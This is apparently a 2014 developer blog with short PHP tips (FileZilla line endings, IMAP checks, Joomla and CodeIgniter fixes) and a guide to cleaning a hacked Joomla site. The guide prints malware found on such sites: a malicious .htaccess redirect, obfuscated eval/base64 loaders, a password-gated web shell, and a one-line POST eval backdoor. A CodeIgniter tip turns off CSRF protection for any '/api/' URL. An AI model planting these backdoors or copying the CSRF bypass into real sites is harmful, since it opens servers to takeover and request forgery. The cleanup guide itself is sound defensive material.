Wednesday, 6 August 2014

How to stop Filezilla as it messes the codes (changing the linebreaks) during upload to server?

If you are pulling your hair when you see the messed up codes/contents as soon as you upload the files(well aligned codes) to the server. Normally, it happens if you are using Filezilla.

By Default, FileZilla is set to "Auto" for File Transfer Type. And, if you have any files which are in ASCII file format, then FileZilla become over-smart and will mess up with those files while transferring to the server.

To Fix that,

1. Go to FileZilla > Edit > Transfers > File Types,
2. Switch to "Binary" and Click "OK"
3. (Optional) You can restart the Filezilla.

Then, Filezilla couldn't able to mess up with your files any more.

Extra Knowledge

What you observe is perfectly normal for ASCII transfers. Different operating systems have different line-ending styles. Windows has $0D0A (), *NIX has $0A () and classic Mac had $0D (). See Data Type.

FTP in ASCII transfer type performs line ending conversion. Example: When uploading in ASCII type from Windows to Linux server, all are converted to . Thus the filesize will shrink, and binary verification tools fail on the target file. Notepad does not support UNIX style line endings and thus shows the file as one line (the rectangles are the chars), but Wordpad does (try opening the file in Wordpad to see for yourself).

Thursday, 31 July 2014

Quick way to check for IMAP Enabled/Disabled on PHP Web server

Please execute the below syntax to check for IMAP feature enabled/disabled on your CPanel

// Code to check for just for IMAP info
var_dump(get_extension_funcs('imap'));

// Below code is to get the server configuration and check for PHP IMAP status
phpinfo();

If IMAP is enabled, the var_dump should return array of string related to imap as below;
array(75) { [0]=> string(9) "imap_open" [1]=> string(11) "imap_reopen..........

Also, if IMAP is enabled, you should able to see below information when you execute phpinfo(); as below;
IMAP
IMAP c-Client Version 2007f
SSL Support enabled

If IMAP is disabled,
Otherwise you would just able to see:  bool(false)

To add Very Custom Global Functions on Joomla 2.5 / 3+

If you are struggling to find a place to put any custom global functions (not exclusive to any components, plugins or modules) on Joomla 2.5, 3.0 & more, the best place I reckon would be under;

/root/libraries/custom/global.php

Where I have created the custom/ folder and created the global.php file where you can put all the global functions as you like;

But, before that please add the below lines of code at the bottom of the loader.php file which is located /root/libraries/loader.php

// Import the custom library for global loader if necessary.
if ( file_exists(JPATH_PLATFORM.'/custom/global.php'))
{
    require_once JPATH_PLATFORM.'/custom/global.php';
}
Once you completed above steps, you can access those functions on global.php from anywhere from within project.

Below is the example of function written on global.php file.

// To print passed parameter string on preformatted text format.
function print_me($str)
{
    echo '<pre>';
    print_r($str);
    echo '</pre>';
}

May be there would be better approach to this issue, but I did as above. Please keep on comment me if you guys have any other way.

Wednesday, 23 July 2014

How to enable a ReCaptcha for both HTTP / HTTPS (SSL enabled domain)

Please use the blow code to enable the Google ReCaptcha for HTTP & SSL enabled domain (i.e. HTTPS URL).
In fact, it will work for both types;
// Works only for HTTP - Get reCAPTCHA JS/HTML Code
$html = recaptcha_get_html($this->config->item('recaptcha_public_key', 'tank_auth'));

// Works for both HTTP / HTTPS - Get reCAPTCHA JS/HTML Code
$html = recaptcha_get_html($this->config->item('recaptcha_public_key', 'tank_auth'), null, true); // just added ", null, true" for ssl
The above code is snapshot of CodeIgniter (CI) based project.

Wednesday, 11 June 2014

POST request using REST API on CodeIgniter return Page Error 500

If you are trying to execute a POST request using REST API on CodeIgniter, and stoked with Page Error 500, or Request Page Not Found error,
An Error Was Encountered
The action you have requested is not allowed.
Then, please check for CSRF Protection check on application/config/config.php file > Line No below. 340 If you are already using the CSRF Security or already enabled, then add the following code just below 'csrf_expire' line.
/** Start of CSRF Skip for APIs Request
 *
 * If the REQUEST_URI has method is POST and requesting the API url,
 * then skip CSRF check, otherwise don't do.
 */
if (isset($_SERVER["REQUEST_URI"]) &&
   (isset($_SERVER['REQUEST_METHOD']) && ($_SERVER['REQUEST_METHOD'] == 'POST') ))
{
    if ( stripos($_SERVER["REQUEST_URI"], '/api/') === false )  
    {
        // If POST request is not for api request, Apply CSRF True
        $config['csrf_protection'] = TRUE;
    }
    else {
        // If POST request is for API, Skip CSRF Check
        $config['csrf_protection'] = FALSE;
    }
}
/** End of CSRF Skip for APIs Request */

Tuesday, 10 June 2014

Blank page during Order Status Updates on Joomla VirtueMart

If you are trying the update the orders' status on Joomla VirtueMart, and you are left with blank page while updating, in that case there is problem with PDF Invoice generation, so for quick redirection to avoid blank page, do following modification.

But, mind you it will not generate any PDF Invoices (its just a quick fix to redirect back after updates). However, I will come back later with solution for PDF Invoice generation.

Go to joomla project root/components/com_virtuemart/controllers/invoice.php > Line no 279
Then comment the line and add the code as below;
279   //return VmPdf::createVmPdf($view, $path, 'F', $metadata);
280   return true;

Thursday, 5 June 2014

To recover a hacked Joomla Website attacked by Malware

If you are using Joomla (particularly on Joomla 2.5.20 or lower)  and you website has been hacked and it sending lots of spam emails from your server, then there might be some hidden code left on your webserver by Malware.

Please find the list of thing which need checking as below;

 1. Check a .htaccess file (if you got any) for something unusual script exist like below;
< IfModule mod_rewrite.c >
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC] 
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/sitename/public_html//common.php -f
RewriteRule ^.*$    /common.php [L]
< / IfModule >
Just remove the above script or if can also replace a .htaccess file with standard joomla .htaccess file.

2. Find any common.php file on the root folder and if you are not sure about it. You can also check whether you see something like below on that file. Please, just delete it.

$PXyCcfGZONUJafapZKpDwrnNv='ba'.'se64_d'.'ecod'.'e';
eval($PXyCcfGZONUJafapZKpDwrnNv("cHJlZ19yZXBsYWNlKCIvQ1JOVjNDQzhOSFNiQ3JWdHNEQkZtRGJlaS9lIiwgIkp3PWVScG1CdHNIM........."));


3. Search for any ajax.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.

$x74="+HM)?Z\"Yb&eny`{BPX^(=3}DT@q-m#9;UwI_[]8p/a~sE4zvW:%7*AdF0\r GruLfh>1cl!Vgt<.RQKJx6i\t5o|\\CN\$O\n,'2Skj"; 
$GLOBALS['utxje85'] = $x74[10].$x74[60].$x74[60].$x74[84].$x74[60].$x74[35].$x74[60].$x74[10]
.......
.......;

4. Similarly, search for any smile.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.

eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIo...........
.......
.......)));

5. Futher, search for any file having below script (particularly update.php file) on any folder and if found it. If found, please just delete those script and make sure you have the right script on those files.

if(!empty($_GET['action']) && $_GET['action'] == 'set_password' && !empty($_GET['hashed_password'])) {

    $hashed_password = $_GET['hashed_password'];
    
    $fh = fopen(PASSWORD_FILE, "w");
    
    if($fh==false) die("unable to create file");
    
    fputs ($fh, $hashed_password);
    
    fclose ($fh);
    
    exit;
}

if(!file_exists(PASSWORD_FILE)) {

    $hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';
    
    $fh = fopen(PASSWORD_FILE, "w");
    
    if($fh==false) die("unable to create file");
    
    fputs ($fh, $hashed_password);
    
    fclose ($fh);

}
else {
    $hashed_password = trim(file_get_contents(PASSWORD_FILE));
}

define('SHELL_PASSWORD', $hashed_password);
define('MAX_UP_LEVELS', 10);

if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
    print '< form method="post" >
Password : < input name="password" type="text" / >  < input type="submit" / >< / form >
';
}

if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {

    setcookie('password', SHELL_PASSWORD, time() + 60*60*24);
    
    header("Location: {$_SERVER['PHP_SELF']}");
    
    exit;
}

if(empty($_COOKIE) || $_COOKIE['password'] != SHELL_PASSWORD) {
    exit;
}

// Actual Joomla Code Start from here....
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);
....
....

6. Moreover, search for p.txt file and if you found it, and if it contains only encrypted string, please delete that file as well;
// sample encrypted code
a6a8cb877ee18215f2c0fc2a6c7b4f2a

7. Also, search for eval(base64_decode($_POST[' script across all files and if you found any, that was put by malware, so delete that line of code across all those found files. Normally, the below code is added at the very top or very bottom of the files;
eval(base64_decode($_POST['n26712b']));

8. Lastly, search for all error_log files across all the folder and delete all if you reckon, they should not be there.

Also, it's quite painful and time consuming to go through all above steps, but just search for any of above scripts which are similar or have similar patterns and trash all. Just beware that targeted file names may be different sometimes.

If you have got anything different then mentioned above, and you got any solution, please comment on this article so that it would be helpful to others